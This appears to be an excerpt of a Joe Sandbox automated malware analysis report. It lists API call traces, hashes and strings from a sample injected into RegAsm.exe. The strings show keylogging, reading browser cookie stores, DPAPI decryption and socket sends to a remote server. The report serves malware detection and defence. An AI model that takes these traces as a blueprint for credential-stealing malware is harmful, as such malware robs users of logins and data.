                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                          • String ID:
                                                          • API String ID: 2951400881-0
                                                          • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                          • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                          • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$lstrcat
                                                          • String ID:
                                                          • API String ID: 493641738-0
                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                          APIs
                                                          • _free.LIBCMT ref: 100091D0
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100091E2
                                                          • _free.LIBCMT ref: 100091F4
                                                          • _free.LIBCMT ref: 10009206
                                                          • _free.LIBCMT ref: 10009218
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                          APIs
                                                          • _free.LIBCMT ref: 004509D4
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 004509E6
                                                          • _free.LIBCMT ref: 004509F8
                                                          • _free.LIBCMT ref: 00450A0A
                                                          • _free.LIBCMT ref: 00450A1C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                          APIs
                                                          • _free.LIBCMT ref: 1000536F
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10005381
                                                          • _free.LIBCMT ref: 10005394
                                                          • _free.LIBCMT ref: 100053A5
                                                          • _free.LIBCMT ref: 100053B6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                          APIs
                                                          • _free.LIBCMT ref: 00444066
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00444078
                                                          • _free.LIBCMT ref: 0044408B
                                                          • _free.LIBCMT ref: 0044409C
                                                          • _free.LIBCMT ref: 004440AD
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                          • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044E738
                                                          • _free.LIBCMT ref: 0044E855
                                                            • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                            • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                            • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                          • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                          • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00AB4960,00000010), ref: 004048E0
                                                            • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                          • String ID: XQG$NG$PG
                                                          • API String ID: 1634807452-3565412412
                                                          • Opcode ID: 2961efda70fdb5f7151a68f0b9acea1000ac1928e381948d950339af0ba4688d
                                                          • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                          • Opcode Fuzzy Hash: 2961efda70fdb5f7151a68f0b9acea1000ac1928e381948d950339af0ba4688d
                                                          • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: `#D$`#D
                                                          • API String ID: 885266447-2450397995
                                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                          • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                          • _free.LIBCMT ref: 10004CE8
                                                          • _free.LIBCMT ref: 10004CF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 2506810119-1068371695
                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63791986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                          • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$0NG
                                                          • API String ID: 368326130-3219657780
                                                          • Opcode ID: 114de0ebd93a070fc2b18bc1688b90dbaff2138f5932efccbda9b41e6a416819
                                                          • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                          • Opcode Fuzzy Hash: 114de0ebd93a070fc2b18bc1688b90dbaff2138f5932efccbda9b41e6a416819
                                                          • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                          APIs
                                                          • SystemParametersInfoW.USER32 ref: 0041CAD7
                                                            • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                            • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                            • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                          • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 004162F5
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                            • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen$CloseCreateValue
                                                          • String ID: !D@$okmode$PG
                                                          • API String ID: 3411444782-3370592832
                                                          • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                          • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                          • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                          APIs
                                                            • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                          • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                          • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                          APIs
                                                            • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                          Strings
                                                          • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                          • API String ID: 1174141254-1980882731
                                                          • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                          • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                          • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventLocalTimewsprintf
                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                          • API String ID: 1497725170-1359877963
                                                          • Opcode ID: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                          • Opcode Fuzzy Hash: 4b61bdf1e4649f408c1e010907dbc1ed31b9c64e2b29a313bfb4962842f39c84
                                                          • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                          APIs
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                          • Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                          • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CryptUnprotectData$crypt32
                                                          • API String ID: 2574300362-2380590389
                                                          • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                          • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                          • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                          • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                          • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
